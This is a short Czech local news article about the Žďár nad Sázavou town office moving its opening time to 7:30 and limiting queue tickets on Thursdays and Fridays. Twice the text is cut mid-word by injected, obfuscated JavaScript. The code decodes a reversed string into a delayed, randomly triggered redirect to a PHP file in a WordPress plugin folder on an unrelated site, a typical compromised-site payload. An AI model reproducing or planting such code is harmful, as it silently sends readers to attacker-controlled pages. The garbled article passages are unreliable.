Rainbow page separator

Městský úřad bude od ledna pro klienty otevřený až od půl osmé

Pátek, 20. prosince 2019

Městský úřad Žďár nad Sázavou  

Žďár nad Sázavou / Počínaje prvním lednovým pracovním dnem bude žďárský městský úřad otevírat o půl osmé ráno. V současné době tam mohou klienti své záleži["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tosti vyřizovat už od sedmi hodin. Důvodem změny provozní doby má být snaha o zvýšení efektivity a optimalizaci pracovní doby tak, aby nemuselo dojít k navýšení počtu úředníků.

Další plánovanou změnou bude úprava vyvolávacího systému. Nově bude nastaven tak, že ve čtvrtek a v pátek vydávání lístků pro klienty skončí už ve 13 hodin. K ["\'///\'="];["\'///\'="]; };["\'//\'="]}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tomu bylo přikročeno v souvislosti s dřívějším zrušením místní příslušnosti registru vozidel i agendy řidičských průkazů. Žďárský odbor dopravy je tak dlouhodobě zahlcen zájemci a pracovníkům již nezbývá čas k vyřízení administrativy a vedení správních řízení.

Od nového roku bude městský úřad pro veřejnost k dispozici v pondělí a ve středu od 7.30 ho 17 hodin, v úterý a ve čtvrtek od 7.30 do 15 hodin a v pátek od 7.30 do 14.30 hodin.